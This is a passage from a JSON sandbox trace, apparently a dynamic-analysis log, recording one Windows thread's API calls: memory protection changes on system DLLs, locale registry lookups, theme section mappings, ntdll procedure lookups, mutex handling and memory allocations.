"pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 150 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001f198", "parentcaller": "0x140005850", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee227b000" }, { "name": "ModuleName", "value": "MSCTF.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00002000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 151 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001f198", "parentcaller": "0x140005850", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000244" } ], "repeated": 0, "id": 152 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001f198", "parentcaller": "0x140005850", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee227b000" }, { "name": "ModuleName", "value": "MSCTF.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00002000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 153 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001f198", "parentcaller": "0x140005850", "category": "process", "api": "NtSetInformationProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessInformationClass", "value": "35" }, { "name": "ProcessInformation", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x0b\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 154 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001f198", "parentcaller": "0x140005850", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\System32\\MSCTF" }, { "name": "DllBase", "value": "0x7ffee21a0000" } ], "repeated": 0, "id": 155 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001f198", "parentcaller": "0x140005850", "category": "system", "api": "LdrpCallInitRoutine", "status": true, "return": "0x00000001", "arguments": [ { "name": "MappedPath", "value": "\\Device\\HarddiskVolume2\\Windows\\System32\\msctf" }, { "name": "BaseAddress", "value": "0x7ffee21a0000" }, { "name": "InitRoutine", "value": "0x7ffee21e0760" }, { "name": "Reason", "value": "1" } ], "repeated": 0, "id": 156 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001f198", "parentcaller": "0x140005850", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee1dc9000" }, { "name": "ModuleName", "value": "IMM32.DLL" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 157 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001f198", "parentcaller": "0x140005850", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee1dc9000" }, { "name": "ModuleName", "value": "IMM32.DLL" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 158 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001f198", "parentcaller": "0x140005850", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000248" } ], "repeated": 0, "id": 159 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001f198", "parentcaller": "0x140005850", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000024c" } ], "repeated": 0, "id": 160 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001f198", "parentcaller": "0x140005850", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee1dc9000" }, { "name": "ModuleName", "value": "IMM32.DLL" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 161 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001f198", "parentcaller": "0x140005850", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee1dc9000" }, { "name": "ModuleName", "value": "IMM32.DLL" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 162 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001f198", "parentcaller": "0x140005850", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee1878000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 163 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001f198", "parentcaller": "0x140005850", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee1878000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 164 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001f198", "parentcaller": "0x140005850", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000024c" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Nls\\CustomLocale" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\CustomLocale" } ], "repeated": 0, "id": 165 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001f198", "parentcaller": "0x140005850", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x0000024c" }, { "name": "ValueName", "value": "ru-RU" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\ru-RU" } ], "repeated": 0, "id": 166 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001f198", "parentcaller": "0x140005850", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000024c" } ], "repeated": 0, "id": 167 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001f198", "parentcaller": "0x140005850", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000024c" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Nls\\ExtendedLocale" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\ExtendedLocale" } ], "repeated": 0, "id": 168 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001f198", "parentcaller": "0x140005850", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x0000024c" }, { "name": "ValueName", "value": "ru-RU" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\ru-RU" } ], "repeated": 0, "id": 169 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001f198", "parentcaller": "0x140005850", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000024c" } ], "repeated": 0, "id": 170 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001f198", "parentcaller": "0x140005850", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000024c" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Nls\\CustomLocale" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\CustomLocale" } ], "repeated": 0, "id": 171 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001f198", "parentcaller": "0x140005850", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x0000024c" }, { "name": "ValueName", "value": "en-US" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US" } ], "repeated": 0, "id": 172 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001f198", "parentcaller": "0x140005850", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000024c" } ], "repeated": 0, "id": 173 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001f198", "parentcaller": "0x140005850", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000024c" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Nls\\ExtendedLocale" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\ExtendedLocale" } ], "repeated": 0, "id": 174 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001f198", "parentcaller": "0x140005850", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x0000024c" }, { "name": "ValueName", "value": "en-US" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US" } ], "repeated": 0, "id": 175 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001f198", "parentcaller": "0x140005850", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000024c" } ], "repeated": 0, "id": 176 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001f198", "parentcaller": "0x140005850", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "10" }, { "name": "TokenInformation", "value": "\\xe7J\\x07\\x00\\x00\\x00\\x00\\x00\\xc2o\\x01\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x7f\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x94\\x0f\\x00\\x00\\x0e\\x00\\x00\\x00\\x18\\x00\\x00\\x00l\\xdf\\x06\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 177 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x14001f198", "category": "process", "api": "NtOpenSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000024c" }, { "name": "DesiredAccess", "value": "0x00000004" }, { "name": "ObjectAttributes", "value": "\\Sessions\\1\\Windows\\ThemeSection" } ], "repeated": 0, "id": 178 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x14001f198", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000024c" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00830000" }, { "name": "SectionOffset", "value": "0x007fe750" }, { "name": "ViewSize", "value": "0x00001000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 179 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x14001f198", "category": "process", "api": "NtOpenSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000248" }, { "name": "DesiredAccess", "value": "0x00000004" }, { "name": "ObjectAttributes", "value": "\\Windows\\Theme2433617381" } ], "repeated": 0, "id": 180 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x14001f198", "category": "process", "api": "NtOpenSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000250" }, { "name": "DesiredAccess", "value": "0x00000004" }, { "name": "ObjectAttributes", "value": "\\Sessions\\1\\Windows\\Theme150788276" } ], "repeated": 0, "id": 181 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x14001f198", "category": "process", "api": "NtUnmapViewOfSectionEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00830000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Flags", "value": "0" } ], "repeated": 0, "id": 182 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x14001f198", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000024c" } ], "repeated": 0, "id": 183 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x14001f198", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000248" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05740000" }, { "name": "SectionOffset", "value": "0x007fee70" }, { "name": "ViewSize", "value": "0x00100000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 184 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x14001f198", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000250" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00830000" }, { "name": "SectionOffset", "value": "0x007fee70" }, { "name": "ViewSize", "value": "0x00005000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 185 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x14001f198", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x7ffee3470000" } ], "repeated": 0, "id": 186 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x14001f198", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x7ffee3470000" }, { "name": "FunctionName", "value": "RtlRegisterFeatureConfigurationChangeNotification" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffee34793b0" } ], "repeated": 0, "id": 187 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x14001f198", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x7ffee3470000" }, { "name": "FunctionName", "value": "NtQueryWnfStateData" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffee350fc40" } ], "repeated": 0, "id": 188 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x14001f198", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x7ffee3470000" }, { "name": "FunctionName", "value": "RtlSubscribeWnfStateChangeNotification" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffee34b2460" } ], "repeated": 0, "id": 189 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x14001f198", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x7ffee3470000" }, { "name": "FunctionName", "value": "RtlDisownModuleHeapAllocation" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffee34efa30" } ], "repeated": 0, "id": 190 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x14001f198", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x7ffee3470000" }, { "name": "FunctionName", "value": "RtlQueryFeatureConfiguration" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffee34ccbd0" } ], "repeated": 0, "id": 191 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x14001f198", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x7ffee3470000" }, { "name": "FunctionName", "value": "RtlDllShutdownInProgress" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffee34d3410" } ], "repeated": 0, "id": 192 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x14001f198", "category": "synchronization", "api": "NtCreateMutant", "status": true, "return": "0x40000000", "arguments": [ { "name": "Handle", "value": "0x0000024c" }, { "name": "MutexName", "value": "Local\\SM0:3308:304:WilStaging_02" }, { "name": "InitialOwner", "value": "0" } ], "repeated": 0, "id": 193 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x14001f198", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000024c" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 0, "id": 194 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x14001f198", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 195 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x14001f198", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Milliseconds", "value": "0" } ], "repeated": 0, "id": 196 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x14001f198", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 197 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x14001f198", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000258" }, { "name": "Milliseconds", "value": "0" } ], "repeated": 0, "id": 198 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x14001f198", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 199 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x14001f198", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000258" }, { "name": "Milliseconds", "value": "0" } ], "repeated": 0, "id": 200 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x14001f198", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000258" } ], "repeated": 0, "id": 201 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x14001f198", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" } ], "repeated": 0, "id": 202 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x14001f198", "category": "synchronization", "api": "NtReleaseMutant", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000024c" } ], "repeated": 0, "id": 203 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x14001f198", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000024c" } ], "repeated": 0, "id": 204 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05922000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 205 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000254" }, { "name": "DesiredAccess", "value": "0x00000009", "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\Session Manager" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager" } ], "repeated": 0, "id": 206 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000254" }, { "name": "ValueName", "value": "ResourcePolicies" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Session Manager\\ResourcePolicies" } ], "repeated": 0, "id": 207 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" } ], "repeated": 0, "id": 208 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00840000" }, { "name": "RegionSize", "value": "0x0001a000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 209 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00840000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 210 }, { "timestamp": "2025-11-20 10:58:26,078", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05924000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": 